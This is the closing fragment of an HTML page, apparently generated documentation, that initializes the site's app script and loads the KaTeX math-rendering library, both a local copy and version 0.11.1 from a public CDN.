      <script>app.initialize({version:"1.0.4",url:{base:"../.."}})</script>
      
        <script src="../../js/katex.js"></script>
      
        <script src="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.js"></script>
      
        <script src="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/contrib/auto-render.min.js"></script>
      
    
  </body>
</html>